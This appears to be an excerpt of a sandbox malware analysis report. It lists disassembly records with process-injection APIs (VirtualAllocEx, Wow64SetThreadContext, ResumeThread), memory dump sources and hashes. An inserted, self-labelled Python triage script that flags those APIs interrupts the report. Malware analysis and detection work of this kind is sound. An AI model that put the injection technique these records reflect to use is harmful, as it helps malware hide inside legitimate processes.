                                                • Instruction Fuzzy Hash: 352127719003499FDB10DFAAC881BDEBBF5FF88310F108829E919A7240D7789945CBA1

                                                Control-flow Graph

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A4AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: ed2124f58559b671952f6fcb97b8ce1977b5bb5af56eb8ff67c55df91d4a6741
                                                • Instruction ID: 64ae210e50a59dda83b8cad14216580848453e0fafb7ad7c0e5508d5a5a8838e
                                                • Opcode Fuzzy Hash: ed2124f58559b671952f6fcb97b8ce1977b5bb5af56eb8ff67c55df91d4a6741
                                                • Instruction Fuzzy Hash: FE215971D003099FDB10DFAAC885BEEBBF4EF88224F548429E559A7241CB789545CFA0

                                                Control-flow Graph

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A4BA18
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 6578a44cd31db1d0235f53a1b3a290448c0fdc388bd8f78b20af1f19307c97f1
                                                • Instruction ID: 591c72568b4a9ccfa7c478640d61cdd8d374cc61e9e359641914819f2237ad96
                                                • Opcode Fuzzy Hash: 6578a44cd31db1d0235f53a1b3a290448c0fdc388bd8f78b20af1f19307c97f1
                                                • Instruction Fuzzy Hash: 572128718003499FDB10DFAAC881BEEFBF5FF88310F508829E518A7240C7799941DBA0

                                                Control-flow Graph

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0243D747
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 96fdaca627dcd753ce6c949fead366d71e75ebbbef0db6bc3adb6d342461b24c
                                                • Instruction ID: 7fd61b63179981d52ab2125020f39629d1b584ea53e8fdce5584044f22603bd5
                                                • Opcode Fuzzy Hash: 96fdaca627dcd753ce6c949fead366d71e75ebbbef0db6bc3adb6d342461b24c
                                                • Instruction Fuzzy Hash: 452103B5D00249EFDB10CFAAD884AEEBBF5FB48320F14841AE958A3350C375A945CF60

                                                Control-flow Graph

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A4AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 90a6017ae86d0642539063674fd1ca4420ea778e31a5790af4fa0a273980bb64
                                                • Instruction ID: fe3b6a443ce85f5ba14a7f06ca0da3311c62bfab17c0b23e3f10d8bcd5a90c8e
                                                • Opcode Fuzzy Hash: 90a6017ae86d0642539063674fd1ca4420ea778e31a5790af4fa0a273980bb64
                                                • Instruction Fuzzy Hash: CE213871D003098FDB50EFAAC8857EEBBF4AF88220F548429D559A7241DB789945CFA0

                                                Control-flow Graph

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A4BA18
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 3a37b8733daf66ccf01375c5f6c90b13186f17c9e36ee54588c6236ac318ca82
                                                • Instruction ID: 0b701967b9e184f63ed0207858b76f2eb3d52d0f9e2f5f086e0267baef792c91
                                                • Opcode Fuzzy Hash: 3a37b8733daf66ccf01375c5f6c90b13186f17c9e36ee54588c6236ac318ca82
                                                • Instruction Fuzzy Hash: DB2128718003499FDB10DFAAC881BEEFBF5FF88310F508829E518A7240C7799541CBA0

                                                Control-flow Graph

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0243D747
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: e0c1923e7b51a40253d0ae652e5cedc32cf1fe118ed04793b5cea91efea4f673
                                                • Instruction ID: 6b623f2f47ba5b6aa134d5f5445f2c516dbbcc14b7f387d482e2273f9a4afecf
                                                • Opcode Fuzzy Hash: e0c1923e7b51a40253d0ae652e5cedc32cf1fe118ed04793b5cea91efea4f673
                                                • Instruction Fuzzy Hash: 6821E3B5900209EFDB10CFAAD984ADEBBF9EB48320F14841AE918A3350D374A940CF61
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A4B456
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 2249d6f5e936270b9d76db7172170f7aa8800616437488c13b6f3993c489f37c
                                                • Instruction ID: a3141b4bd9d547f2e6d76c9d8ba622273d0de0b44dbd922a9c0edea431f46218
                                                • Opcode Fuzzy Hash: 2249d6f5e936270b9d76db7172170f7aa8800616437488c13b6f3993c489f37c
                                                • Instruction Fuzzy Hash: D411477180024D9FDB10EFAAC844BDEBBF5AF88320F148819E519A7250CB759540CBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: f1e9dc3de0593a94b8e9e28849b4b14fa47e270d128f714f3fcbe949a589a2fb
                                                • Instruction ID: eb27e60dbb90eb994e377f923a374a98966d46484a1d3f172ff400d5b19ccffd
                                                • Opcode Fuzzy Hash: f1e9dc3de0593a94b8e9e28849b4b14fa47e270d128f714f3fcbe949a589a2fb
                                                • Instruction Fuzzy Hash: 771149718003498FDB10DFAAC8857DFFBF9EB88624F248419D519A7240CB796545CBA4
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A4B456
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: d0113e193a716cb66c17be6f4c12035974706dd27c0d52ff3d5e2223144935c1
                                                • Instruction ID: 18f0a387922ec70174cd1554c00c9b2f0819cd809c31a39908e5c536c8bc11e1
                                                • Opcode Fuzzy Hash: d0113e193a716cb66c17be6f4c12035974706dd27c0d52ff3d5e2223144935c1
                                                • Instruction Fuzzy Hash: 6A1126718003499FDB10EFAAC844BDEBBF5AF88720F148819E519A7250CB75A540CFA0
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A4F8DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 7ac0f50121d570f4bf7637cea1035d2dc68725cb7b3bc859d76bb7d2f5bf6dcc
                                                • Instruction ID: 4b78d1e1a8abf94fe5d31060b3c42a74cf0e33522221235015633aabf02c5252
                                                • Opcode Fuzzy Hash: 7ac0f50121d570f4bf7637cea1035d2dc68725cb7b3bc859d76bb7d2f5bf6dcc
                                                • Instruction Fuzzy Hash: 4611E3B58003499FDB10DF9AD885BDEFBF8FB48724F208419E518A7641C375A544CFA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 4722143682e0cab90a5058a9d1ccba46bb7265adb7895d9b229762ad125d6c53
                                                • Instruction ID: 08d17c7364c7e18c2514db35841cb736bdfc79997af02f06d9366bddaba843e4
                                                • Opcode Fuzzy Hash: 4722143682e0cab90a5058a9d1ccba46bb7265adb7895d9b229762ad125d6c53
                                                • Instruction Fuzzy Hash: C0113A71D003498FDB10EFAAC84579FFBF5AF88720F148819D519A7240CB796944CF94
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A4F8DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: fb8480f4198d9e6878d6d81158500228abc133c70a0ed86343599e4d81473030
                                                • Instruction ID: aaf7252a6a35f636c6f4ca96955afd77af64d71846a9eae8aaab6dcdd0cb92a2
                                                • Opcode Fuzzy Hash: fb8480f4198d9e6878d6d81158500228abc133c70a0ed86343599e4d81473030
                                                • Instruction Fuzzy Hash: 4C11F2B58003499FDB10EF9AD885BDEBBF8FB88320F108419E558A7241C375A944CFA5
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0243B03E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: fdd58d4103c0cf5e50f29719cf382b0a0bcd413172eee1d25796c3777d84ef29
                                                • Instruction ID: 12d7dc042781fcc3d45c5a77ad40ad147168c080e55f162d37def305cc9a1f09
                                                • Opcode Fuzzy Hash: fdd58d4103c0cf5e50f29719cf382b0a0bcd413172eee1d25796c3777d84ef29
                                                • Instruction Fuzzy Hash: 5A110FB5C003498FDB20CF9AD544BDEFBF4EB88224F10842AD428A7640D379A545CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14e8c2f34cae32fa0778b4ab31b15db5d477036d473c38f41aff1655f96e43cc
                                                • Instruction ID: d219828ad492251b6ab10b1abae88ca81c18184316f27b7b64f3512baf92775b
                                                • Opcode Fuzzy Hash: 14e8c2f34cae32fa0778b4ab31b15db5d477036d473c38f41aff1655f96e43cc
                                                • Instruction Fuzzy Hash: EFB18C74B012089FDB14DF69D594BAEBBF6AF88700F2540A9E505AB3A1CB71DD01DF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39c1839a9fba3c12c72f96d41f90eb394f8037fa28871a7cf8e5ce9321657362
                                                • Instruction ID: e6d1e313776518920e9b8814f386668b32df5430e38bf3b6c4f5fd48e334a4ee
                                                • Opcode Fuzzy Hash: 39c1839a9fba3c12c72f96d41f90eb394f8037fa28871a7cf8e5ce9321657362
                                                • Instruction Fuzzy Hash: FD21D075A05304DFDB14DF18D984F26BBA5FB88324F20C97DD84A4B286C33AD847CA62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0ed8259e90b6fcb88c1b81202234eb99e61502c2573e78c0e6a963db984933f
                                                • Instruction ID: 14bca19efb65bba0a3221092572aaf823a0825b9a159eedd6789586490990103
                                                • Opcode Fuzzy Hash: a0ed8259e90b6fcb88c1b81202234eb99e61502c2573e78c0e6a963db984933f
                                                • Instruction Fuzzy Hash: 4A21D0B5A05304AFDB05DF10D984F26BBA5FB84314F24CA7DE8494B292C33AD846CB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 187bd04b1970e5fa847d7412bcf38866edafb255fba28e48536abd7631a34e2f
                                                • Instruction ID: 419f83a6bd1c5f5dac220a390c6f867b2f1fe4b2e71f2086c1eb159c3507d77c
                                                • Opcode Fuzzy Hash: 187bd04b1970e5fa847d7412bcf38866edafb255fba28e48536abd7631a34e2f
                                                • Instruction Fuzzy Hash: 3A21D53160960ADFDBA48F18D85477ABFE1FB45319F048167E0A9CB29AC375D884EB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be0b5b844f2485bc2a325d6d0ea7892746803144c25fbd8339d4bc181c0bc827
                                                • Instruction ID: 525cd82ee5bdec1eb0cda651450f676c9d51119c6684e53757dd1eacd0df16a4
                                                • Opcode Fuzzy Hash: be0b5b844f2485bc2a325d6d0ea7892746803144c25fbd8339d4bc181c0bc827
                                                • Instruction Fuzzy Hash: DB2150755093809FDB12CF24D994B15BF71EB46314F28C5EED8498B6A7C33A980ACB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1a94b2cac2280c321d81e413b4cb96fe183a27a0609f5ec5bb5ea282b67c8b0
                                                • Instruction ID: e34fc5f95ffc0e6aed90df0c04524a57e667ce9ea17bac68e8ce582a3d065a6f
                                                • Opcode Fuzzy Hash: b1a94b2cac2280c321d81e413b4cb96fe183a27a0609f5ec5bb5ea282b67c8b0
                                                • Instruction Fuzzy Hash: F711043260561ADBDB608F18E854779BFF1FB8531AF058166E059CB28AC375C850FB60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                • Instruction ID: 3fe9df1f57472315dfdc595e92110c79e65529e0a971e4710bc516669d1d8a2c
                                                • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                • Instruction Fuzzy Hash: 5911DD76904280DFDB01CF10C9C0B15FBB2FB84324F24C6AED8494B296C33AD80ACB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c2cfe77296c5287d1f52f7f5c2a4b76817df3889a9173ec16944f893cdaaa01
                                                • Instruction ID: 2a25c2890a2653f655c52fcbe5ba819bf0287f7042f4fd5f0d6b88b474e18c63
                                                • Opcode Fuzzy Hash: 6c2cfe77296c5287d1f52f7f5c2a4b76817df3889a9173ec16944f893cdaaa01
                                                • Instruction Fuzzy Hash: B8C18D717017188BDB56DF76C460BAEBBFBAF88700F14446ED18A9B690CB35E901CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6fd05e1cd4d559cc74e70601796e30c1fac01f84885d72b159172564db321d8
                                                • Instruction ID: 9e7dcccf01577da0eca02516a98289e664a671ba7817134efae062570616c815
                                                • Opcode Fuzzy Hash: c6fd05e1cd4d559cc74e70601796e30c1fac01f84885d72b159172564db321d8
                                                • Instruction Fuzzy Hash: AFE12F74E006198FDB14EF99C9809AEFBB2FF89301F248169D515AB35AD7319D42CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 353670522dff56a8793e4a20186a8428f5361c9c6e3759a0b1a3c432de9aa8b9
                                                • Instruction ID: 29410b84840e1275bb951499ece3fe1496995bce3f5ff6f2f395e59ad68dd0ae
                                                • Opcode Fuzzy Hash: 353670522dff56a8793e4a20186a8428f5361c9c6e3759a0b1a3c432de9aa8b9
                                                • Instruction Fuzzy Hash: 07E1FD74E006198FDB14EF99C980AAEFBB2FF89305F248159E415AB355D730AD42CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 679ce1fb57eb13a79d4ddd3b11800b106fd6abdff65eb3b3490c38db362c7332
                                                • Instruction ID: 92d52a8c182bf710617838ec853852416ffec7089e5ab8eb3c53e771642d1f1f
                                                • Opcode Fuzzy Hash: 679ce1fb57eb13a79d4ddd3b11800b106fd6abdff65eb3b3490c38db362c7332
                                                • Instruction Fuzzy Hash: 63E13C74E002198FDB14EFA9C980AAEFBF2FF89305F248159D414AB356C731A941CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dcb7d4f5c5d762ed1ca20dc12a2ff51af70c250c781ab599ae11907e50502aa3
                                                • Instruction ID: 3796c617f77d8a20c50367266427d039e1a9430f16b262654ffdb18a2409209e
                                                • Opcode Fuzzy Hash: dcb7d4f5c5d762ed1ca20dc12a2ff51af70c250c781ab599ae11907e50502aa3
                                                • Instruction Fuzzy Hash: C5E10D74E006198FDB54EF99C980AAEFBB2FF89305F248159D415AB356D730AD42CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b22f32cca6d5144d707e3baf2226d937b54ba4f0ae5838ea23a07c77675ecabe
                                                • Instruction ID: 493e8eef660fd73442e53e36230b46eda5f68c0e01f17241108b6619427af4d7
                                                • Opcode Fuzzy Hash: b22f32cca6d5144d707e3baf2226d937b54ba4f0ae5838ea23a07c77675ecabe
                                                • Instruction Fuzzy Hash: 05E11C74E006198FDB14EF99D9809AEFBF2FF89305F248169D415AB356C734A942CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24b66138fb27aed56aaf43bd8dc25a8b0e5b698d1ffd06dc83f22e6ee54152dc
                                                • Instruction ID: 01393571c9fcda14b76246d8a48c3128eb308c24c5a3c774d31860549bbc1fe6
                                                • Opcode Fuzzy Hash: 24b66138fb27aed56aaf43bd8dc25a8b0e5b698d1ffd06dc83f22e6ee54152dc
                                                • Instruction Fuzzy Hash: 97A16F36E006058FCF06DFB5C94099EB7B2FF89304B16856BE901AB661DB71D95ACF40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd2f4858c81317080c0de26b229cc391b23f54fc674f0b67bd1453b9d0824ec7
                                                • Instruction ID: 3c0fd3506e40431b2cfb160241b87a8e6a68f70abe9878783f5ffc0a3e593f1c
                                                • Opcode Fuzzy Hash: bd2f4858c81317080c0de26b229cc391b23f54fc674f0b67bd1453b9d0824ec7
                                                • Instruction Fuzzy Hash: 84514A74E006198FDB14DFA9C9849AEFBF2FF89301F248169D418AB356D7319942CFA1
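The records above give, for each recovered function, the API it calls and the memory dump it was disassembled from. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it re-parses four of those records (copied verbatim), decodes the .sdmp dump name, and flags injection-related APIs executing from RWX private memory that carries no PE header, which is what separates the unpacked stage at 06A40000 from the image-backed code at 00400000. The field layout of the .sdmp name (process index, base address, protection, memory type) is an assumption read off the names on this page; PAGE_EXECUTE_READWRITE = 0x40 and MEM_PRIVATE = 0x20000 are winnt.h constants; the set of injection APIs is this editor's selection.

```python
"""Triage the disassembly listing above: flag process-injection APIs that run
from unpacked memory. Added example, not part of the Joe Sandbox report."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# winnt.h constants.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000

# Editor's choice of APIs that make up an allocate/write/execute injection chain.
INJECTION_APIS = {
    "VirtualAllocEx", "WriteProcessMemory", "NtMapViewOfSection", "DuplicateHandle",
    "SetThreadContext", "QueueUserAPC", "CreateRemoteThread", "ResumeThread",
}

# Constructed sample: four records copied verbatim from the report.
SAMPLE = """\
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A4B456
Memory Dump Source
• Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06A4F8DD
Memory Dump Source
• Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0243B03E
Memory Dump Source
• Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
Memory Dump Source
• Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
"""

API_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File:\s*(?P<name>[0-9A-Fa-f.]+\.sdmp),\s*Offset:\s*[0-9A-Fa-f]+,"
                    r"\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int  # call-site address

@dataclass
class DumpRecord:
    process: int        # Joe Sandbox process index (0 = submitted sample)
    base: int           # base address of the dumped region
    protect: int        # page protection at dump time
    mem_type: int       # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    based_on_pe: bool   # True when the region carries a PE header
    apis: List[ApiCall] = field(default_factory=list)

    def is_unpacked_stage(self) -> bool:
        """RWX private memory without a PE header: code the sample unpacked itself."""
        return (not self.based_on_pe and self.protect == PAGE_EXECUTE_READWRITE
                and self.mem_type == MEM_PRIVATE)

def parse_sdmp_name(name: str) -> Tuple[int, int, int, int]:
    """ASSUMPTION: the eight dot-separated fields are process.stage.id.base.protect.
    <unknown>.type.<unknown>; only fields matching winnt.h constants are interpreted."""
    parts = name[:-len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected sdmp name: {name}")
    return int(parts[0], 16), int(parts[3], 16), int(parts[4], 16), int(parts[6], 16)

def parse_records(text: str) -> List[DumpRecord]:
    """Each 'Source File' line closes the record whose API lines precede it."""
    records: List[DumpRecord] = []
    pending: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            pending.append(ApiCall(m.group(1), m.group(2), int(m.group(4), 16)))
            continue
        m = SRC_RE.search(line)
        if m:
            proc, base, prot, mtype = parse_sdmp_name(m.group("name"))
            records.append(DumpRecord(proc, base, prot, mtype,
                                      m.group("pe").lower() == "true", pending))
            pending = []
    return records

def triage(text: str) -> List[Dict[str, object]]:
    """Injection APIs called from an unpacked stage; PE-backed code is left alone."""
    findings: List[Dict[str, object]] = []
    for rec in parse_records(text):
        if not rec.is_unpacked_stage():
            continue
        for call in rec.apis:
            if call.name in INJECTION_APIS:
                findings.append({"process": rec.process, "region": rec.base,
                                 "api": call.name, "ref": call.ref})
    return findings
```

Run against the whole listing, the same parser yields one line per function in unpacked memory, so the VirtualAllocEx, ResumeThread and DuplicateHandle functions in the 06A40000 region above read as one injection chain rather than isolated hits. Records whose API lines the report omits (the ResumeThread entries above carry only an API ID) will not be flagged, so the API ID field is the fallback when the APIs list is empty.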

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5.1%
                                                Signature Coverage:9.6%
                                                Total number of Nodes:136
                                                Total number of Limit Nodes:8
                                                execution_graph (rendered call graph; the node and edge list is omitted here). Root nodes, with no incoming edges in the listing, sit at 401a30, 424e43, 42f9e3, 42bde3, 424ab3, 41b383, 414083, 41e583, 413b13, 418e08 and 11c2b60. The graph reaches ExitProcess, LdrInitializeThunk, LdrLoadDll, NtClose, PostThreadMessageW, RtlAllocateHeap and RtlFreeHeap.

                                                Control-flow Graph

